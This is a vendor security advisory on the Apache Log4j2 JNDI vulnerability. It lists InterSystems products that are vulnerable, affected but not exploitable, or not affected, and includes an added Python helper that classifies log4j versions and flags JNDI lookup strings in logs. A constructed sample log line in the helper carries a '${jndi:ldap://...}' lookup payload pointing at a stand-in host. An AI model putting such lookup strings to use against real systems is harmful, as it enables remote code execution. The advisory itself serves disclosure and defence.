JNDI Vulnerability in Apache Log4j2 Library Affecting InterSystems Products/Services

LAST UPDATED: 22 DECEMBER 2021 17:00 UTC/12:00 EST
This document is posted at: https://www.intersystems.com/gt/apache-log4j2/

Summary

InterSystems investigated the impact of a security vulnerability related to Apache Log4j2. In addition, please see the note at the end of this alert regarding Log4j 1.2.17. Log4j2 is a widely used open-source, third-party Java logging library found in many software applications and services.

The vulnerability — impacting at least Apache Log4j2 (versions 2.0 to 2.14.1) — was announced by Apache and is reported in the United States National Vulnerability Database (NVD) as CVE-2021-44228 with the highest severity rating on the Common Vulnerability Scoring System (CVSS), 10.0. The initial remediation from Apache, v2.15.0, was incomplete as noted in CVE-2021-45046. 

Apache Log4j2 features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system. 
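As an added illustration of the two facts this alert gives a defender to act on, the affected version ranges and the attacker-controlled lookup string, here is a small triage helper. It is example code written for this page, not InterSystems' or Apache's; the version classification encodes only the ranges the alert states (2.0 to 2.14.1 for CVE-2021-44228, 2.15.0 as the incomplete fix of CVE-2021-45046) and reports anything else as not covered, the regular expression is a deliberately simple assumption rather than a complete rule, and the log lines are constructed samples.

```python
"""Added example (not InterSystems' or Apache's code): triage helpers for the
Log4j2 JNDI lookup issue described in this alert.

Two checks a defender typically wants:
  1. classify a discovered log4j-core version against the ranges this alert
     names (2.0 to 2.14.1 affected by CVE-2021-44228; 2.15.0 incomplete per
     CVE-2021-45046);
  2. flag log lines that carry a ${jndi:...} lookup string, the
     attacker-controlled input the alert describes.
All sample inputs below are constructed for illustration.
"""
import re
from typing import List, Tuple


def parse_version(v: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); missing components are treated as 0."""
    m = re.match(r"(\d+(?:\.\d+)*)", v.strip())
    if not m:
        raise ValueError(f"not a version string: {v!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def classify_log4j_version(v: str) -> str:
    """Map a log4j-core version to the status this alert describes.

    Only the ranges stated in the alert are encoded; anything else is
    reported as outside the alert rather than guessed at.
    """
    ver = parse_version(v)
    if ver[0] == 1:
        return "log4j 1.x: see the Log4j 1.2 section of this alert (CVE-2021-4104, CVE-2019-17571)"
    if (2, 0, 0) <= ver <= (2, 14, 1):
        return "vulnerable: CVE-2021-44228"
    if ver == (2, 15, 0):
        return "incomplete fix: CVE-2021-45046"
    return "not covered by this alert; check the Apache advisory"


# Matches a JNDI lookup token in a log message. Case-insensitive so that
# capitalised variants are not missed. This is a simplified triage pattern
# (an assumption of this example), not an exhaustive detection rule.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, line) for each line containing a ${jndi: lookup."""
    return [(n, line) for n, line in enumerate(lines, 1) if JNDI_LOOKUP.search(line)]


# Constructed sample access-log lines, not real traffic. Line 2 carries a
# lookup string in the User-Agent field, which a vulnerable application
# would pass into a log message.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 302 0 "-" "curl/7.79"',
]


if __name__ == "__main__":
    for v in ("2.0", "2.14.1", "2.15.0", "2.16.0", "1.2.17"):
        print(f"log4j {v}: {classify_log4j_version(v)}")
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup string on sample line {n}: {line}")
```

Run it as a script to see the classification for each sample version and the one flagged log line; in practice you would feed `classify_log4j_version` the versions reported by a software inventory and `find_jndi_lookups` the lines of any log that records request headers or parameters.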

InterSystems investigated the impact of these vulnerabilities on its products and services, including its Managed Services. Apache has provided general remediations for the vulnerabilities which some customers may find helpful. 

A list of products affected and not affected by these vulnerabilities is provided below. Any product not listed in the Products Under Investigation or Vulnerable Products section of this alert is to be considered not vulnerable. 

No further updates are expected on this alert.  


Vulnerable Products

The following lists InterSystems products that are affected by the vulnerabilities that are described in this alert. Customers should contact the WRC for further details on affected products.

Registered InterSystems customers can get more information about how each vulnerable product is affected and steps to mitigate the vulnerabilities from the WRC remediation document (WRC login required). 

Data Platforms Add-ons
• Adaptive Analytics
• InterSystems Reports Server
• InterSystems Reports Designer

TrakCare
• TrakCare Core

Products Containing Vulnerable log4j2 but Not Exploitable
The following products contain a vulnerable version of log4j2 but the library is not used to process data from untrusted sources. 

Data Platforms Add-ons
• InterSystems Cloud Manager

HealthShare
• HealthShare Clinical Viewer (2019.2 to 2021.2)


Products Confirmed Not Vulnerable

InterSystems has confirmed that the following products do not contain log4j and are not affected by these vulnerabilities:

Data Platforms
• InterSystems IRIS
• Caché
• InterSystems IRIS for Health
• Ensemble


Data Platforms Add-ons

• Atelier Integration
• CSP Gateway for CE
• IRIS Studio
• InterSystems API Manager
• InterSystems Kubernetes Operator (IKO)
• ISC Agent
• Legacy .Net bindings
• Legacy node JS binding
• ODBC Driver
• System Alerting and Monitoring (SAM)
• VS Code Integration
• Web Gateway for IRIS
• Zen Mojo

HealthShare
• HealthShare Clinical Viewer (2019.1 and earlier)
• Unified Care Record
• Care Community
• Personal Community
• Provider Directory
• Health Insight
• Patient Index
• Health Connect


TrakCare

• TrakCare Editions
• TrakCare Lab

Cloud Delivery Offerings
• FHIR Accelerator (FHIRaaS)
• HealthShare Message Transformation Service
• Health Integration as a Service


Log4j 1.2 Issues

As part of the investigation into Log4j2 impacts on InterSystems products, and following the release of CVE-2021-4104 and the rescoring of CVE-2019-17571 on 16 December 2021, InterSystems is providing notice that the following product contains Log4j 1.2.17. InterSystems is continuing to evaluate the fix and will update this alert as additional information becomes available.

Data Platforms Add-ons
• IntegratedML
(As shipped with InterSystems IRIS, vulnerable only when configured to use the H2O provider)